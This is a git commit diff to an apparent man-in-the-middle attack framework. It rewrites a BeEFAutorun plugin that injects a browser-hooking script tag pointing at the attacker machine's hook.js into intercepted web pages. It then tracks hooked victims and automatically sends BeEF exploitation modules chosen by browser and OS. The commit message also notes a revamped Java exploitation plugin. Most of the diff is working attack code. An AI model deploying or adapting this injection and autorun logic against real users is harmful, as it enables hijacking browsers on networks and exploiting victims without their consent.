- Revamped Javapwn plugin with new detection and exploitation algo

- Added whitelist/blacklist ip options to the inject plugin - Revamped Beefautorun plugin, with new injection algo - Metasploit and BeEF options are now a config file (mitmf.cfg)
2025-07-14 17:13:50 -07:00 · 2014-12-21 17:33:56 +01:00 · 2014-12-21 17:33:56 +01:00 · f359ee7cdd
commit f359ee7cdd
parent 4ae50e6e0c
7 changed files with 211 additions and 121 deletions
--- a/plugins/BeefAutorun.py
+++ b/plugins/BeefAutorun.py
@ -1,10 +1,12 @@
 from plugins.plugin import Plugin
 from plugins.Inject import Inject
 from time import sleep
+import logging
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import get_if_addr
 import sys
 import json
 import threading
-import logging
 import libs.beefapi as beefapi

 try:
@ -17,57 +19,57 @@ requests_log.setLevel(logging.WARNING)


 class BeefAutorun(Inject, Plugin):
-	name = "BeEFAutorun"
-	optname = "beefauto"
-	has_opts = True
-	desc = "Injects BeEF hooks & autoruns modules based on Browser or OS type"
+	name     = "BeEFAutorun"
+	optname  = "beefauto"
+	has_opts = False
+	desc     = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"

 	def initialize(self, options):
-		self.options = options
-		self.autoruncfg =  options.autoruncfg
-		self.hookip = options.hookip
-		self.beefip = options.beefip
-		self.beefport = options.beefport
-		self.beefuser = options.beefuser
-		self.beefpass = options.beefpass
-		self.dis_inject = options.dis_inject
-
-		beef = beefapi.BeefAPI({"host": self.beefip, "port": self.beefport})
-		if beef.login(self.beefuser, self.beefpass):
-			print "[*] Successfully logged in to BeEF"
-		else:
-			sys.exit("[-] Error logging in to BeEF!")
+		self.options    = options

+		beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF']
 		userconfig = ConfigObj("./config/beefautorun.cfg")
+		
 		self.Mode = userconfig['mode']
-
 		self.All_modules = userconfig["ALL"]
 		self.Targeted_modules = userconfig["targets"]

-		if self.dis_inject:
-			if not self.hookip:
-				sys.exit("[-] BeEFAutorun requires --hookip")
-			Inject.initialize(self, options)
-			self.count_limit = 1
-			self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.hookip, self.beefport)
+		try:
+			self.ip_address = get_if_addr(options.interface)
+			if self.ip_address == "0.0.0.0":
+				sys.exit("[-] Interface %s does not have an IP address" % options.interface)
+		except Exception, e:
+			sys.exit("[-] Error retrieving interface IP address: %s" % e)

+		Inject.initialize(self, options)
+		self.black_ips = []
+		self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.ip_address, beefconfig['beefport'])
+		
+		beef = beefapi.BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
+		if beef.login(beefconfig['user'], beefconfig['pass']):
+			print "[*] Successfully logged in to BeEF"
+		else:
+			sys.exit("[-] Error logging in to BeEF!")
+		
 		print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
 		t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
 		t.setDaemon(True)
 		t.start()

 	def autorun(self, beef):
-		already_ran = []
+		already_ran    = []
 		already_hooked = []
+
 		while True:
 			sessions = beef.sessions_online()
-			if sessions is not None and len(sessions) > 0:
+			if (sessions is not None and len(sessions) > 0):
 				for session in sessions:

 					if session not in already_hooked:
 						info = beef.hook_info(session)
 						logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
 						already_hooked.append(session)
+						self.black_ips.append(str(info['ip']))

 					if self.Mode == 'oneshot':
 						if session not in already_ran:
@ -83,9 +85,9 @@ class BeefAutorun(Inject, Plugin):

 	def execModules(self, session, beef):
 		session_info = beef.hook_info(session)
-		session_ip = session_info['ip']
+		session_ip   = session_info['ip']
 		hook_browser = session_info['name']
-		hook_os = session_info['os']
+		hook_os      = session_info['os']

 		if len(self.All_modules) > 0:
 			logging.info("%s >> sending generic modules" % session_ip)
@ -115,12 +117,3 @@ class BeefAutorun(Inject, Plugin):
 									else:
 										logging.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
 									sleep(0.5)
-
-	def add_options(self, options):
-		group = options.add_mutually_exclusive_group(required=False)
-		group.add_argument('--hookip', dest='hookip', help="Hook IP")
-		group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
-		options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
-		options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
-		options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
-		options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')